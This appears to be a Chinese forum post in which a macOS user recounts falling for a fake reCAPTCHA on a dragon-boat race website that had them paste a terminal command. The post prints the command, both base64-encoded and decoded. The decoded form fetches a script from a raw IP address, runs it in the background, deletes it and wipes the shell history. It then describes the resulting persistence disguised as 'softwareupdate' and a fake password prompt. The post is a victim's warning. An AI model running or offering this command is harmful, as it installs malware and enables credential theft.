昨天想查一下今天龙舟赛的安排,就用 DuckDuckGo 快速搜了一下,点进一个网站。https://hkcdba.org/hkidbr (后面查又说是官方网站,是被黑了吗?)
打开之后,弹出了标准的 "I'm not a robot" reCAPTCHA 验证。我很自然地就准备开始点图片验证,结果这次等来的压根不是图片,而是直接弹出了一张指引图,一步一步教我怎么打开终端,粘贴进去运行。应该是在我点击验证的时候,就已经把那段命令自动复制到我的剪贴板了。我当时也没多想,平时 github 里粘贴命令运行已经形成肌肉记忆了,鬼使神差地打开终端,直接粘贴,按下了回车。
运行的命令是这样的
echo 'I am not a robot - reCAPTCHA Verification ID: 432426' && echo 'ZXhwb3J0IFNSQ19VUkw9J2h0dHBzOi8vaGtjZGJhLm9yZy8nICYmIChjZCAvdG1wICYmIGN1cmwgLWtmc1NMICJodHRwOi8vNjIuNjAuMTU1LjE0My80ZjZiYjEyZjk4NDI4N2Q/Zm9yY2U9MSIgLW8gLk5lcWdnZiAmJiBiYXNoIC5OZXFnZ2YgJiYgcm0gLWYgLk5lcWdnZikgPiAvZGV2L251bGwgMj4mMSAmIGNsZWFyOyBwcmludGYgJ1wwMzNbM0onOyBoaXN0b3J5IC1kICQoaGlzdG9yeSAxIDI+L2Rldi9udWxsIHwgYXdrICd7cHJpbnQgJDF9JykgMj4vZGV2L251bGw7IGZjIC1wIC9kZXYvbnVsbCAyPi9kZXYvbnVsbDsgcHJpbnRmICdcbiAgXDAzM1szMm1ceGUyXHg5Y1x4OTMgVmVyaWZpY2F0aW9uIHN1Y2Nlc3NmdWxcMDMzWzBtXG5cbic=' | base64 -D
把里面的 base64 解析出来是这个
export SRC_URL='https://hkcdba.org/' && (cd /tmp && curl -kfsSL "http://62.60.155.143/4f6bb12f984287d?force=1" -o .Neqggf && bash .Neqggf && rm -f .Neqggf) > /dev/null 2>&1 & clear; printf '\033[3J'; history -d $(history 1 2>/dev/null | awk '{print $1}') 2>/dev/null; fc -p /dev/null 2>/dev/null; printf '\n \033[32m\xe2\x9c\x93 Verification successful\033[0m\n\n'%
命令执行完,终端里立刻用绿色大字打印出了 "Verification successful"。回到网页并没有变化。
但真正的异常才刚刚开始。没过几秒钟,系统突然弹出一个提示,说有一个后台任务正在运行,而且这个任务被伪装成了系统更新进程 "softwareupdate"。
我赶紧去取消这个后台活动,但紧接着,没过多久屏幕上又弹出一个无法关闭的对话框,声称“系统软件已损坏”,要求我输入用户密码。
这时候我已经完全清醒了,不敢再输入任何东西。那个弹窗关也关不掉,我赶紧电源键强制重启。
重启之后问了下 deepseek ,然后赶紧把网络给掐了。后面查 plist ,发现有个伪装的 softwareupdate 的配置。然后今天预约了天才吧把全盘格式化重装了个系统。
1
Select Language